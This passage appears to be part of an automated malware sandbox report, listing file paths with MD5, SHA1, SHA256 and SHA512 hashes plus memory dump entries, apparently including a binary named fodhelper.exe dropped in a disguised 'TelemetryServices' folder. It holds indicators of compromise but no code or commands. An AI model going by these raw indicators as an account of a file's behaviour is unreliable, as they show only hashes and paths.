| SHA256 | 0017b86e648f0637bc95d8233f90527d0978bd8b6e872f3c9b36b02f468a2397 |
| SHA512 | 29b193891ac2bfa34f5abfc474badd6199aa38693356e067477046b2c2ab69db01c43747eb36faf5158bfec31290f1677c06a74bef052f298f2de7a2c8ee8c85 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD7C2.tmp.txt
| MD5 | c9aed76f52a027017779daec81956a27 |
| SHA1 | 44d2f3f6abd8f6f4292af96024eb01fd164602b5 |
| SHA256 | 9b348829cce25a06e216a6a6873af09ab56e6a0f0e1750137589d4465728ab1a |
| SHA512 | c8ade81abce6cf4bc520a2af0f3d9fe4234711610c049cafea246d4d1c4703f25dfd89bdfe53d97131ad364a70611c3702e758099f94b6580916ba0f2b0e75c5 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD8DD.tmp.csv
| MD5 | 1186cf2593b61385cee4aa486e01226b |
| SHA1 | c72c23a487dd3652215328eea8a795a2d38b7a21 |
| SHA256 | ec9e3838b54bac87cdaf948df748778540c25facb831d676dd2f569762c590d4 |
| SHA512 | 4e892a2739945cd16ddb8ff4f81fa7064c88dbd1890b589a373da3fd73041da1670a15e2f426b84f039f62d76e3f263adbe3b0e96b9d6145007505910bf34683 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD94B.tmp.txt
| MD5 | 527ccfd0579ae13daa5480c284915152 |
| SHA1 | d14c4d67aa1d549c3d9a15ef7ad6b90178b75c0f |
| SHA256 | 950e034e5b5331db2d3732047a218ea8141a6cdd739e1d237e6d1aae654b219a |
| SHA512 | 22fdb0de06ad073778c73c76fb2a13add1b4f262a983851067da9ff346bad0c8ff591495aad908af15dff790faa9b8e7b259fc0924bd0a67669191375c69ecd1 |
memory/4816-388-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/260-394-0x0000000000000000-mapping.dmp
memory/2428-396-0x0000000000000000-mapping.dmp
memory/2088-402-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1F4E.tmp.csv
| MD5 | edc2971adb55fbd56cf0c5abc30b5320 |
| SHA1 | 727c16aa1272ff69df79bb39d5376732084371ca |
| SHA256 | be8845db2d6d5bf7ed462b15ca42c251781e2548ca02ebe48bebd31bd9625bdc |
| SHA512 | 701af5934f884a834978272c747f349bf1cecbaedbe61907747d677f892a0f15ba2e68d8fad9fc5ce84baf35c47d745e73c0f468f39293f5556fd6db7ea6f435 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1F9D.tmp.txt
| MD5 | 912a84e5c88dccb7970379f76b9f7767 |
| SHA1 | 28ddca0504c6f4dc3eccdb23cde6b320bf95da13 |
| SHA256 | 1de4f778d16abe418d9cfe091901fbe1a21abd471547f2505fc54d5f972a2558 |
| SHA512 | f3dea1dffdea6268182ee93a1a81bf684a78cfc5967bb01b4bc442c44bde64e76db456fe590b04d7a8d90c66552018df7c0c0f2a438a8925f80b5dd9649cd1e6 |
memory/3748-411-0x0000000000000000-mapping.dmp
memory/4912-416-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2386.tmp.csv
| MD5 | f4ef2ef0a603c309632d8a19ccd86306 |
| SHA1 | 8238df9d33255b1049d0df1ed7334d5b8a7da588 |
| SHA256 | c7338ff8c45574e1c38005f73dcab005f2b8c925501500cc3776dd0ce9b5bdce |
| SHA512 | 927d0d9c984afc6e3f73dcdb2755ee35ac43883149677209aeec02acfdc8b1609e652a3baef282853b83e925cd962fd41a024fc410897bc010c9dc7fd16ef9d4 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER23D5.tmp.txt
| MD5 | 533db9014a445e023c9d728c87d72d41 |
| SHA1 | 2ac61fb34420dde320118e36808aad149ce1bdeb |
| SHA256 | 07eac1d651c80eea3858bbd2d6bf8eb6a2ebc6fab8e6e9f72eb4af58d34860fa |
| SHA512 | d94f1e67dc8bf00a5675bb953ffd87e25293bfbb8a671a2cae76f4d861ded9431a09f835b8fe1c4a393423d715b27cdebf00c7cf10409052f9c68ccf27aecca0 |